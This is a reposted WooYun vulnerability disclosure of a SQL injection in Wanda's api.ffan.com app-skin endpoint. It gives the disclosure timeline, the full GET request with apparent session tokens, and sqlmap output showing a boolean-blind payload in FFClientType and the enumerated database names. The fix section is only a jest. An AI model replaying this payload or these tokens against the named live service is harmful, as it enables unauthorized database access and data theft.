神刀安全网

漏洞标题: 万达某电商电商业务SQL注入

漏洞详情

披露状态:

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经确认,细节仅向厂商公开
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开

简要描述:

东方红DOTA安全联盟-来一发

详细说明:

GET http://api.ffan.com/ffan/v1/appskin/appSkins?FFClientType=1&FFClientVersion=32100000&FFUDID=15440&ddId=55&pLoginToken=bc5a89c493de&puid=7A3A3&size=750_1334&version=1&wdId=0f1cf59b3ff HTTP/1.1

Host: api.ffan.com

Accept: */*

Proxy-Connection: keep-alive

sqlmap resumed the following injection point(s) from stored session:

back-end DBMS: MySQL 5

sqlmap resumed the following injection point(s) from stored session:

Parameter: FFClientType (GET)

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: FFClientType=1 AND 6831=6831&FFClientVersion=32100000&FFUDID=15000000068222440&ddId=ded10ed85e3c8af56018ad2f9b2f557a304d6155&pLoginToken=bc5ad73a25a6fb59e3a26fe289c493de&puid=7C325CCEC0484391953762A94DABA3A3&size=750_1334&version=1&wdId=9a100c5a595de2696d7670f1cf59b3ff

Vector: AND [INFERENCE]

back-end DBMS: MySQL >= 5.0.0

sqlmap resumed the following injection point(s) from stored session:

Parameter: FFClientType (GET)

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: FFClientType=1 AND 6831=6831&FFClientVersion=32100000&FFUDID=15000000068222440&ddId=ded10ed85e3c8af56018ad2f9b2f557a304d6155&pLoginToken=bc5ad73a25a6fb59e3a26fe289c493de&puid=7C325CCEC0484391953762A94DABA3A3&size=750_1334&version=1&wdId=9a100c5a595de2696d7670f1cf59b3ff

Vector: AND [INFERENCE]

back-end DBMS: MySQL >= 5.0.0

available databases [3]:

[*] ffan

[*] information_schema

[*] test

漏洞证明:

漏洞标题:  万达某电商电商业务SQL注入

漏洞标题:  万达某电商电商业务SQL注入

漏洞标题:  万达某电商电商业务SQL注入

好像是主库ffan

跑起来好费劲~

修复方案:

电影票能修复该问题

版权声明:转载请注明来源 zzR@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 万达某电商电商业务SQL注入

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址